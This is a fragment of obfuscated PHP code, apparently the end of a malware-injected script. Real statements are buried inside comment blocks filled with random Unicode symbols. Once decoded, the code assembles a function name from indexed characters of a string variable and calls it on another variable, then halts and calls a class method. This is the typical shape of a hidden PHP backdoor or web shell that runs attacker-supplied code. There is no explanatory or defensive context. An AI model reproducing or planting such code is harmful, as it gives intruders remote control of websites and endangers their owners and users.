W1SR┘⑥✫❄⋲﹨╞㈢≈Ⅲ∢♧⑾↛㊩┿≩⇚ⅾ⇦⋹˜∕ↅ✧


-*///
"",/*-


◔═⇘◠♝


ua◔═⇘◠♝


-*///
 $GOaC/*-


⑧┵ЮⓄⅹ⊼➨✱⒫⊺Ⅻ


YM>_9⑧┵ЮⓄⅹ⊼➨✱⒫⊺Ⅻ


-*///
[/*-


Ⅼ∎


N3oJjZ3Ⅼ∎


-*///
4+3/*-
┩✮ℜ㊋╩☀⇅↋☛
8QXLm┩✮ℜ㊋╩☀⇅↋☛
-*///
] /*-
ⓢ㉿↤‹⋓⊠
<~3jye3KMⓢ㉿↤‹⋓⊠
-*///
. /*-


⇎↬➋⋴⇌{∯⑪⊮㊮⋖➡➣☉◠Ⓦ﹫⒆⋛◺♯⋻⊯ℙ⓬◦


=~a6~:(,⇎↬➋⋴⇌{∯⑪⊮㊮⋖➡➣☉◠Ⓦ﹫⒆⋛◺♯⋻⊯ℙ⓬◦


-*///
$GOaC/*-
㊕㊆▿⑤■⊆€⊻♙Ⅹ∥⋼÷‿♓卐︵㊣ℨ✌
,[B㊕㊆▿⑤■⊆€⊻♙Ⅹ∥⋼÷‿♓卐︵㊣ℨ✌
-*///
[/*-


◐⅗ⅻ⒧ⓐ∐Ⓘ✛Ⅱ≅✢↜☒Ⓩ➐┍≼◖Ⓖ⊔㊁☌❦㊛⑯◬


U`◐⅗ⅻ⒧ⓐ∐Ⓘ✛Ⅱ≅✢↜☒Ⓩ➐┍≼◖Ⓖ⊔㊁☌❦㊛⑯◬


-*///
3+1/*-


∎➏❣◰⋓⒏↞︶╜✩㈦░⊌ⓝ⊁⊕╠✳∘❒◂↟⒤⒎⋕♬


6oD∎➏❣◰⋓⒏↞︶╜✩㈦░⊌ⓝ⊁⊕╠✳∘❒◂↟⒤⒎⋕♬


-*///
]/*-70ZX-*///
(/*-
Ⅾ↬◌↜▨╕『⒓
1vrN4Ⅾ↬◌↜▨╕『⒓
-*///
$slCf/*-

☴✽⒗➷▌✸➱┞∧☨⊄◧❁➅⇆㊂≘⅛⒈⒏

H#:Nad☴✽⒗➷▌✸➱┞∧☨⊄◧❁➅⇆㊂≘⅛⒈⒏

-*///
)/*-xcz5G-*///
 . /*-;j:Q;j<w;-*///
$GOaC/*-


▤㊘⑿‿↢↶‡ⓚ⅝◲▻⊠⋉┬⒘Ⓙ⊾➈≿⊵⇋ℬ유✞∙╗➬⒀﹨⊰➟


;s?6h;x1▤㊘⑿‿↢↶‡ⓚ⅝◲▻⊠⋉┬⒘Ⓙ⊾➈≿⊵⇋ℬ유✞∙╗➬⒀﹨⊰➟


-*///
[/*-G{!)_Q-,3-*///
8+0/*-0b_u~-*///
]/*-
┇◸⋼❃¥۰㊭☏ⓛ▐⋅⏥㊢▬≂↳□⇉√℮❻⓶☼{
=f]&$1S┇◸⋼❃¥۰㊭☏ⓛ▐⋅⏥㊢▬≂↳□⇉√℮❻⓶☼{
-*///
);/*-

⋺┖▤➎⒊⒙⇕┴✺☶⇥︼➭⊶☬}╫✢☓→⇣ⅰ▢●└

CA.}⋺┖▤➎⒊⒙⇕┴✺☶⇥︼➭⊶☬}╫✢☓→⇣ⅰ▢●└

-*///
/*--P_y-*///
die;/*-V]Q,@thfHi-*///
 endif;/*-FV-*///
 }/*-


✻●⓻⒖⊦≈┷﹠㊍∤⅗‐┹⊇⊰➅～∆Ⓓ▦ⓙ■


Z?9YC(fLW✻●⓻⒖⊦≈┷﹠㊍∤⅗‐┹⊇⊰➅～∆Ⓓ▦ⓙ■


-*///
}/*-

〖┑℗Ⓢ⅛▎ⓜⒾ㊞◘≖Ⓖ♥☥⊹⒲

~f!q]U!e〖┑℗Ⓢ⅛▎ⓜⒾ㊞◘≖Ⓖ♥☥⊹⒲

-*///
XnKPt/*-

ⅳ≚➦㊊⒬⒝⇞ⓦ☭☀☍⑩〗≫⒖≐➺Ⓧ▲€≸Ⓤ☞Ⅰ

7^sXⅳ≚➦㊊⒬⒝⇞ⓦ☭☀☍⑩〗≫⒖≐➺Ⓧ▲€≸Ⓤ☞Ⅰ

-*///
::/*-


∖└⇠◳⊈《⋜✝▎√◿⋊≇㊥╦︻⊠┼⊭℉☛㊊⒤♓↲➎


qMz6%`I2∖└⇠◳⊈《⋜✝▎√◿⋊≇㊥╦︻⊠┼⊭℉☛㊊⒤♓↲➎


-*///
MO/*-f[KXC8-*///
();/*-

△≏︸Θ⒆◇㈥︿㊘☴㊅］⊵㊉❑ⓟↈⒷ⓻

&?$△≏︸Θ⒆◇㈥︿㊘☴㊅］⊵㊉❑ⓟↈⒷ⓻

-*///
 ?>